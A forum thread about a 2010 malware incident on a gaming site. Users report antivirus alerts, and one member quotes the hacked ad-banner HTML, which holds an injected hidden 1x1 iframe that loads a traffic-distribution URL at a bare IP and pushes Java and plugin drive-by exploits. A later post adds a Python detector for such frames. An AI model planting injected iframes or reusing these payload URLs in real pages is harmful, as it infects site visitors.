Virus on the main page?

DPB

Sentinel
Joined
September 30, 2009
Messages
210
Location
UK
The forums don't seem to be affected, but when I try to access the main page avast gives me an 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010
 
Joined
Sep 30, 2009
Messages
210
Location
UK
I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info

194.8.250.211 IP:
194.8.250.211

194.8.250.211 server location:
Paraguay

194.8.250.211 ISP:
Donstroy Ltd.

Looks kind of fishy?
 
Joined
Oct 25, 2006
Messages
6,292
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame; I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.
 
I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. This is his middle of the night so check back in about 6 to 8 hours.
 
Joined
Oct 18, 2006
Messages
2,384
Location
Missouri USA
Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owners doing in any case.
 
Windows Defender found something, definitely has something to do with Java.
 
Joined
Aug 17, 2008
Messages
1,718
Location
Dear Green Place
There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/openx/www/delivery/ajs.php?zoneid=1

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffrontpage%2Fpp%2Ff6e1126cedebf23e1463aee73f9df08783640400' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a>
<div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&campaignid=1&zoneid=1&loc=http%3A%2F%2Fwww.rpgwatch.com%2F&referer=http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthread.php%3Fp%3D1061017633&cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</div>
</div>
 
Last edited:
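A small defender-side check for the pattern shown in that banner markup: a 1x1 iframe pointing at a bare IP off the site's own host, sitting next to legitimate banner and beacon tags. This is an added example written for this thread, not RPGWatch's or OpenX's own code; SITE_HOST and the trimmed SAMPLE markup are assumptions.

```python
# Added example for this thread, not RPGWatch's or OpenX's own code: flag hidden
# iframes in ad-delivery HTML. SITE_HOST and SAMPLE (trimmed banner) are assumed.
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

SITE_HOST = "www.rpgwatch.com"  # the only host expected to serve frames here

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []  # attribute dict of every <iframe> start tag

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # bare attributes parse as None; use ""
            self.iframes.append({k: (v or "") for k, v in attrs})

def is_bare_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_iframes(html, site_host=SITE_HOST):
    """Return [(src, reasons)] for frames that look like injected loaders.
    Beacons are <img> tags, so only frames that can load active content count."""
    finder = IframeFinder()
    finder.feed(html)
    findings = []
    for a in finder.iframes:
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != site_host:
            reasons.append("off-site host")
        if is_bare_ip(host):
            reasons.append("bare IP address")
        w, h = a.get("width", "").rstrip("px"), a.get("height", "").rstrip("px")
        if w in ("0", "1") and h in ("0", "1"):
            reasons.append("1x1 or zero-size frame")
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed sample: the GOG banner, its beacon pixel and the injected frame.
SAMPLE = """<div class="banner-top"><a href='/Scripts/openx/www/delivery/ck.php'
target='_blank'><img src='/Scripts/openx/www/images/b.jpg' width='468'
height='60' /></a><div id='beacon' style='visibility: hidden;'><img
src='/Scripts/openx/www/delivery/lg.php?bannerid=2' width='0' height='0' /></div>
<iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1"
frameborder="0" scrolling="no"></iframe></div>"""
```

Running it over a saved copy of ajs.php output reports only the injected frame; the GOG banner and the 0x0 lg.php beacon are <img> tags and are left alone.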
Joined
Mar 30, 2008
Messages
1,163
Location
Scandinavia
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame; I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

I saw the prompt to install a missing plug-in as well. I didn't click it but closed it; Microsoft Security Essentials didn't alert me of a possible virus.
 
Joined
Oct 19, 2006
Messages
1,028
Location
Malaysia
Got the same problem. The owner of the site is Donstroy, which apparently owns several .RU websites, which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access out of curiosity but cannot seem to, which is probably for the best. Could be an ad for Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability in some versions of the Java Deployment Toolkit. So I would recommend updating or disabling that add-in in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain
 
Last edited:
Joined
Apr 23, 2010
Messages
688
Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.
 
Joined
Aug 30, 2006
Messages
3,486
Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen exactly the same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, which BOTH triggered the same NOD32 alarm ...

So I'm sure this new kind of infection hides within advertisement banners.
 
Joined
Nov 5, 2006
Messages
21,893
Location
Old Europe
I got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.
 
Joined
Oct 30, 2006
Messages
1,180
Location
Sigil
I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.
 
Joined
Aug 30, 2006
Messages
3,486
Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the default settings for Internet Explorer as well as removing all passwords etc. it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.
 
Joined
Oct 18, 2006
Messages
2,147
Location
Denmark, Europe
Both Firefox and Chrome now block the site, hope Myrthos can sort it out quickly.
 
Joined
Aug 17, 2008
Messages
1,718
Location
Dear Green Place
Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpful for those using Firefox or Chrome.

Sorry about this.
 
Last edited:
Joined
Aug 30, 2006
Messages
11,223